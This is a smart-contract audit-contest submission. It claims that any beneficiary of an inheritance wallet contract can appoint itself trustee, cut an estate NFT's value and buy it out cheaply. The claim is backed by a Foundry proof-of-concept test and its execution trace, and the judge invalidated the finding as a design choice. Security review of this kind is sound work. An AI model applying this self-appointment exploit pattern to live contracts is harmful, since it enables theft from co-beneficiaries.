Inheritable Smart Contract Wallet
First Flight #35
Beginner FriendlySolidity
100 EXP
View results
Previous Next
Submission Details
Severity: high
Invalid

[H-7] Unsecure set of Trustee role

0xnick

Summary

The function InheritanceManager::appointTrustee appoints an address as the Trustee role. This can be done by any beneficiary.

The trustee role has privileges that allow to change the assetToPay or nftValue. This directly affects functions such as buyOutEstateNFT.

Vulnerability Details

A malicious trustee can be set which can change the nftValue to a low amount, allowing a beneficiary to buy at a low price.

The impact is high as dividends for other beneficiaries are not distributed according to the value set by the owner.

The following code shows how user1 is a beneficiary can appoint itself to change the value of an nft.

function test_maliciousBeneficiaryCanBuyOutAtLowPrice() public {
address user2 = makeAddr("user2");
address user3 = makeAddr("user3");
vm.warp(1);
vm.startPrank(owner);
im.addBeneficiery(user1);
im.addBeneficiery(user2);
im.addBeneficiery(user3);
im.createEstateNFT("our beach-house", 100e18, address(weth));
vm.stopPrank();
weth.mint(user1, 1e18);
vm.warp(1 + 90 days);
vm.startPrank(user1);
weth.approve(address(im), 1e18);
im.inherit();
im.appointTrustee(user1);
im.setNftValue(1, 1e18);
im.buyOutEstateNFT(1);
vm.stopPrank();
}
[PASS] test_maliciousBeneficiaryCanBuyOutAtLowPrice() (gas: 434111)
Traces:
[434111] InheritanceManagerTest::test_maliciousBeneficiaryCanBuyOutAtLowPrice()
├─ [0] VM::addr(<pk>) [staticcall]
│ └─ ← [Return] user2: [0x537C8f3d3E18dF5517a58B3fB9D9143697996802]
├─ [0] VM::label(user2: [0x537C8f3d3E18dF5517a58B3fB9D9143697996802], "user2")
│ └─ ← [Return]
├─ [0] VM::addr(<pk>) [staticcall]
│ └─ ← [Return] user3: [0xc0A55e2205B289a967823662B841Bd67Aa362Aec]
├─ [0] VM::label(user3: [0xc0A55e2205B289a967823662B841Bd67Aa362Aec], "user3")
│ └─ ← [Return]
├─ [0] VM::warp(1)
│ └─ ← [Return]
├─ [0] VM::startPrank(owner: [0x7c8999dC9a822c1f0Df42023113EDB4FDd543266])
│ └─ ← [Return]
├─ [69042] InheritanceManager::addBeneficiery(user1: [0x29E3b139f4393aDda86303fcdAa35F60Bb7092bF])
│ └─ ← [Stop]
├─ [23142] InheritanceManager::addBeneficiery(user2: [0x537C8f3d3E18dF5517a58B3fB9D9143697996802])
│ └─ ← [Stop]
├─ [23142] InheritanceManager::addBeneficiery(user3: [0xc0A55e2205B289a967823662B841Bd67Aa362Aec])
│ └─ ← [Stop]
├─ [143726] InheritanceManager::createEstateNFT("our beach-house", 100000000000000000000 [1e20], ERC20Mock: [0x2e234DAe75C793f67A35089C9d99245E1C58470b])
│ ├─ [95512] NFTFactory::createEstate("our beach-house")
│ │ ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: InheritanceManager: [0x88F59F8826af5e695B13cA934d6c7999875A9EeA], tokenId: 1)
│ │ ├─ emit MetadataUpdate(_tokenId: 1)
│ │ └─ ← [Return] 1
│ └─ ← [Stop]
├─ [0] VM::stopPrank()
│ └─ ← [Return]
├─ [46784] ERC20Mock::mint(user1: [0x29E3b139f4393aDda86303fcdAa35F60Bb7092bF], 1000000000000000000 [1e18])
│ ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: user1: [0x29E3b139f4393aDda86303fcdAa35F60Bb7092bF], value: 1000000000000000000 [1e18])
│ └─ ← [Stop]
├─ [0] VM::warp(7776001 [7.776e6])
│ └─ ← [Return]
├─ [0] VM::startPrank(user1: [0x29E3b139f4393aDda86303fcdAa35F60Bb7092bF])
│ └─ ← [Return]
├─ [24735] ERC20Mock::approve(InheritanceManager: [0x88F59F8826af5e695B13cA934d6c7999875A9EeA], 100000000000000000000 [1e20])
│ ├─ emit Approval(owner: user1: [0x29E3b139f4393aDda86303fcdAa35F60Bb7092bF], spender: InheritanceManager: [0x88F59F8826af5e695B13cA934d6c7999875A9EeA], value: 100000000000000000000 [1e20])
│ └─ ← [Return] true
├─ [22686] InheritanceManager::inherit()
│ └─ ← [Stop]
├─ [23266] InheritanceManager::appointTrustee(user1: [0x29E3b139f4393aDda86303fcdAa35F60Bb7092bF])
│ └─ ← [Stop]
├─ [2108] InheritanceManager::setNftValue(1, 1000000000000000000 [1e18])
│ ├─ emit NftValueSet(index: 1, value: 1000000000000000000 [1e18])
│ └─ ← [Stop]
├─ [28683] InheritanceManager::buyOutEstateNFT(1)
│ ├─ [26058] ERC20Mock::transferFrom(user1: [0x29E3b139f4393aDda86303fcdAa35F60Bb7092bF], InheritanceManager: [0x88F59F8826af5e695B13cA934d6c7999875A9EeA], 666666666666666666 [6.666e17])
│ │ ├─ emit Transfer(from: user1: [0x29E3b139f4393aDda86303fcdAa35F60Bb7092bF], to: InheritanceManager: [0x88F59F8826af5e695B13cA934d6c7999875A9EeA], value: 666666666666666666 [6.666e17])
│ │ └─ ← [Return] true
│ └─ ← [Stop]
├─ [0] VM::stopPrank()
│ └─ ← [Return]
└─ ← [Stop]

Impact

High. Malicious Trustee can change the value of the NFT or the asset to pay, leading to direct loss to beneficiaries.

Tools Used

  • Manual Review

Recommendations

Implement a secure way where there must be a consensus between beneficiaries to appoint a trustee.

Updates

Lead Judging Commences

0xtimefliez Lead Judge 5 months ago
Submission Judgement Published
Invalidated
Reason: Design choice

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.